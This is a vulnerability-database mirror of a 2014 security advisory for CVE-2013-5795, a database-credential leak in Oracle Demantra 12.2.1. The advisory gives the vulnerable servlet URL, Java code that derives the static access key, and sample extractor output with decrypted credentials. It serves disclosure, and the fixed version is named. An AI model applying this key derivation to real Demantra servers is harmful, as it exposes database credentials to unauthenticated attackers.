Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormOliver GruskovnjakPACKETSTORM:125484
HistoryMar 02, 2014 - 12:00 a.m.

Oracle Demantra 12.2.1 Database Credential Leak

2014-03-0200:00:00
Oliver Gruskovnjak
packetstormsecurity.com
43

EPSS

0.885

Percentile

98.7%

JSON
`Vulnerability title: Database Credentials Leak in Oracle Demantra  
CVE: CVE-2013-5795  
Vendor: Oracle  
Product: Demantra  
Affected version: 12.2.1  
Fixed version: 12.2.3  
Reported by: Oliver Gruskovnjak  
  
Details:  
  
Oracle Demantra version 12.2.1 has a backend function that allows anyone  
to retrieve the database instance name and the corresponding credentials.  
  
Exploit:  
  
The target URL is:  
  
http://target.com:8080/demantra/ServerDetailsServlet?UAK=  
  
Now the UAK key is calculated statically:  
  
String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));  
  
StringBuffer tmp = new StringBuffer("sge");  
tmp.append(0);  
tmp.append(encryptedPassword);  
  
uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));  
  
From that information it is possible to create a simple extractor:  
  
pixel:demantra user$ java getUAK  
-=[Oracle Demantra Database Details Retriever ]=-  
  
[+] UAK Key is: 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1  
[+] Retrieved the following encrypted string:  
4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,  
[+] Decrypted string is:  
TEST?test?demantra?orc?1  
  
Together with the authentication bypass this can be exploited unauthenticated as well.  
  
  
  
Further details at:  
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5795/  
  
  
Copyright:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
  
Disclaimer:  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.  
  
  
`

Related

prion 2
cvelist 1
exploitdb 1
zdt 1
nvd 2
cve 2
metasploit 1
packetstorm 1
threatpost 1
securityvulns 1
oracle 1
prion
prion
Buffer overflow
2014-01-15 16:11:00
Design/Logic Flaw
2014-03-27 17:56:00
cvelist
cvelist
CVE-2013-5795
2014-01-15 00:30:00
exploitdb
exploitdb
Oracle Demantra 12.2.1 - Database Credentials Disclosure
2014-03-01 00:00:00
zdt
zdt
Oracle Demantra 12.2.1 - Database Credentials Disclosure
2014-03-01 00:00:00
nvd
nvd
CVE-2013-5795
2014-01-15 16:11:04
CVE-2014-5795
2014-03-27 17:56:21
cve
cve
CVE-2013-5795
2014-01-15 16:11:04
CVE-2014-5795
2014-03-27 17:56:21
metasploit
metasploit
Oracle Demantra Database Credentials Leak
2014-04-07 18:42:47
packetstorm
packetstorm
Oracle Demantra Database Credentials Leak
2024-09-01 00:00:00
threatpost
threatpost
Four Oracle Demantra Security Vulnerabilities Found
2014-03-03 14:08:14
securityvulns
securityvulns
Oracle / Sun / MySQL / PeopleSoft / OpenJDK applications multiple security vulnerabilities
2014-05-05 00:00:00
oracle
oracle
Oracle Critical Patch Update - January 2014
2014-01-14 00:00:00

EPSS

0.885

Percentile

98.7%

JSON
Related for PACKETSTORM:125484
prion2cvelist1exploitdb1zdt1nvd2cve2metasploit1packetstorm1threatpost1securityvulns1oracle1